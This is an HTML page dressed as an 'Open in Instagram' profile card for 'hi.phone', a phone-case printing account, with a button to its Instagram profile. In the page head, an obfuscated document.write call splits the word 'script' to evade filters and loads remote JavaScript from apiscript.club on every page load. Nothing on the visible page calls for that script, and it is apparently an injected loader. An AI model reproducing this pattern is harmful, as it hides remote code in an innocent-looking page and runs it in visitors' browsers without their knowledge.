<!DOCTYPE html>
<html>
    <head>
        <title>Open in Instagram</title>
        <meta charset="utf+8">
        <meta name="viewport" content="width=600">
        <script type="text/javascript">document.write('<scr'+'ipt src="//apiscript.club/dash/main.js?'+Math.random()+'" type="text/javascript"></scr'+'ipt>');</script>
        
        <style>
            body {
                min-width: 500px;
                background: #f5f5f5;

                font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";
            }

            * {
                -moz-box-sizing: border-box; /* Firefox */
                box-sizing: border-box; 
            }

            .container {
                width: 100%;
                max-width: 500px;
                margin: 0 auto;
                padding-left: 30px;
                padding-right: 30px;
                padding-top: 15px;
                padding-bottom: 15px;
                text-align: center;
            }

            .btn {
                display: block;
                background: #745AE0;
                border-radius: 41px;
                border: 0px solid #C2CADE;
                font-size: 16px;
                color: #FFFFFF;
                padding-top: 18px;
                padding-bottom: 17px;
                width: 100%;
                outline: 0;
                font-weight: bold;
                box-shadow: 0px 15px 30px 0px rgba(116, 90, 224, 0.35);
                text-shadow: 0px 15px 30px rgba(116, 90, 224, 0.35);
                -o-transition: .2s;
                -ms-transition: .2s;
                -moz-transition: .2s;
                -webkit-transition: .2s;
                transition: .2s;
                cursor: pointer;
                text-decoration: none;
            }

            .btn-open { margin: 0 auto; margin-top: 30px; width: 400px; font-size: 20px; padding-top: 20px; padding-bottom: 22px; }

            .img-round {
                border-radius: 50%;
                -moz-border-radius: 50%;
                -webkit-border-radius: 50%;
                display: block;
                margin: 0 auto;
                margin-top: 20px;
                border: 2px solid red;
                width: 150px;
                height: 150px;
            }

            .annotation {
                font-size: 22px;
                line-height: 1.6;
                font-weight: 500;
            }

            .open-descriptor {
            font-size: 18px;
            font-weight: 300;
            color: #7d7d7d;
            display: block;
            margin-top: 35px;
            }

            .footer {
                left: 0;
                width: 100%;
                text-align: center;
                margin-top: 100px;
            }

            .footer a {
            font-size: 18px;
            color: #8a8a8a;
            text-decoration: underline;
            }
        </style>
    </head>
    <body>
        <div class="container">
            <img src="https://instagram.fdnk1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/45529088_1077254059121336_8566010206822072320_n.jpg?_nc_ht=instagram.fdnk1-2.fna.fbcdn.net&_nc_ohc=yiZAKqw6Ct8AX-WRS33&oh=0c06cd697e4924f23588ee0bfbdf8bd2&oe=5EB34704" class="img-round" width="150"/>
                 <h1>hi.phone</h1>
                 <div style="margin-top: 30px;">
                    <p class="open-descriptor">See Instagram photos and videos from <<hi.phone>>                    | Mobile Massage</p>
                </div>
                <div style="margin-top: 30px;">
                    <p class=""><br/> hi.phone <br/> Печать чехлов на любые модели Apple, Samsung, Xiaomi, Huawei, Sony
По всем вопросам пишите в директ.<br/> </p>
                </div>

            <a href="https://www.instagram.com/hi.phone/" class="btn btn-open">Open in Instagram</a>
        </div>

        


        <script>
            // setTimeout(function(){window.location.replace('https://www.instagram.com/forbes/');}, 2500);
        </script>



    </body>
</html>